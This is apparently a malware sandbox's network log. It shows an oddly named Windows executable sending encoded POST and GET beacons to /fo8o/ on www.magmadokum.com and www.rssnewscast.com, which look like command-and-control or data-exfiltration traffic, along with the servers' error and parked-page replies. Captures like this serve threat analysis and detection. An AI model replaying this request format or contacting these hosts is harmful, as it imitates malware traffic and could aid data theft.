7 | 192.168.2.4 | 49810 | 85.159.66.93 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 12:54:24.547323942 CET | 10879 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.magmadokum.com
                                                                              Origin: http://www.magmadokum.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.magmadokum.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 56 67 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=... [TRUNCATED]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.4 | 49816 | 85.159.66.93 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:54:27.206227064 CET | 507 | OUT | GET /fo8o/?0xilO=7vZpwBG&SHqP-p=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.magmadokum.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:55:28.530539036 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.4 | 49961 | 91.195.240.94 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:55:33.929876089 CET | 780 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.rssnewscast.com
                                                                              Origin: http://www.rssnewscast.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.rssnewscast.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d
                                                                              Data Ascii: SHqP-p=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
                                                                              Nov 21, 2024 12:55:35.249577045 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                              date: Thu, 21 Nov 2024 11:55:35 GMT
                                                                              content-type: text/html
                                                                              content-length: 556
                                                                              server: Parking/1.0
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              10 | 192.168.2.4 | 49969 | 91.195.240.94 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:55:36.577708006 CET | 800 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.rssnewscast.com
                                                                              Origin: http://www.rssnewscast.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.rssnewscast.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d
                                                                              Data Ascii: SHqP-p=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
                                                                              Nov 21, 2024 12:55:37.945368052 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                              date: Thu, 21 Nov 2024 11:55:37 GMT
                                                                              content-type: text/html
                                                                              content-length: 556
                                                                              server: Parking/1.0
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              11 | 192.168.2.4 | 49975 | 91.195.240.94 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:55:39.244597912 CET | 10882 | OUT | POST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.rssnewscast.com
                                                                              Origin: http://www.rssnewscast.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.rssnewscast.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 72 55 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=... [TRUNCATED]
                                                                              Nov 21, 2024 12:55:40.519042015 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                              date: Thu, 21 Nov 2024 11:55:40 GMT
                                                                              content-type: text/html
                                                                              content-length: 556
                                                                              server: Parking/1.0
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              12 | 192.168.2.4 | 49983 | 91.195.240.94 | 80 | 3752 | C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Nov 21, 2024 12:55:41.896395922 CET | 508 | OUT | GET /fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBG HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.rssnewscast.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:55:43.312450886 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                              date: Thu, 21 Nov 2024 11:55:43 GMT
                                                                              content-type: text/html; charset=UTF-8
                                                                              transfer-encoding: chunked
                                                                              vary: Accept-Encoding
                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              pragma: no-cache
                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_s+0CA6JISv73Xc32eJ2ucSjWklwJI7eUTPGT13U3HP0Z3l+ExEK7dtQmM//fL7/qxqqniedy/MawybEBkPr5NA==
                                                                              last-modified: Thu, 21 Nov 2024 11:55:43 GMT
                                                                              x-cache-miss-from: parking-7ffff5845f-2bmzc
                                                                              server: Parking/1.0
                                                                              connection: close
                                                                              Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 73 2b 30 43 41 36 4a 49 53 76 37 33 58 63 33 32 65 4a 32 75 63 53 6a 57 6b 6c 77 4a 49 37 65 55 54 50 47 54 31 33 55 33 48 50 30 5a 33 6c 2b 45 78 45 4b 37 64 74 51 6d 4d 2f 2f 66 4c 37 2f 71 78 71 71 6e 69 65 64 79 2f 4d 61 77 79 62 45 42 6b 50 72 35 4e 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                              Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_s+0CA6JISv73Xc32eJ2ucSjWklwJI7eUTPGT13U3HP0Z3l+ExEK7dtQmM//fL7/qxqqniedy/MawybEBkPr5NA==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                                              Nov 21, 2024 12:55:43.312478065 CET | 224 | IN | Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                                              Data Ascii: on you're looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png"
                                                                              Nov 21, 2024 12:55:43.312493086 CET | 1236 | IN | Data Raw: 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74
                                                                              Data Ascii: href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-header__link{float:right;margin-right:100px;margin-bottom:15px;font-size:16px;color:#9a9494}.container-content{clear:both}/*! normalize.css v7.0.0 | MIT Li
                                                                              Nov 21, 2024 12:55:43.312515974 CET | 1236 | IN | Data Raw: 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61
                                                                              Data Ascii: optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}butto576n,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}butt
                                                                              Nov 21, 2024 12:55:43.312531948 CET | 1236 | IN | Data Raw: 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 36 32 36 32 36 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a
                                                                              Data Ascii: }[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#7171
                                                                              Nov 21, 2024 12:55:43.312547922 CET | 1236 | IN | Data Raw: 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73
                                                                              Data Ascii: om/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#0a
                                                                              Nov 21, 2024 12:55:43.312603951 CET | 1236 | IN | Data Raw: 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e
                                                                              Data Ascii: -link:focus{text-decoration:underline}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.
                                                                              Nov 21, 2024 12:55:43.312619925 CET | 1236 | IN | Data Raw: 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f
                                                                              Data Ascii: r-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#555}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.con
                                                                              Nov 21, 2024 12:55:43.312638044 CET | 1236 | IN | Data Raw: 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 69 6e
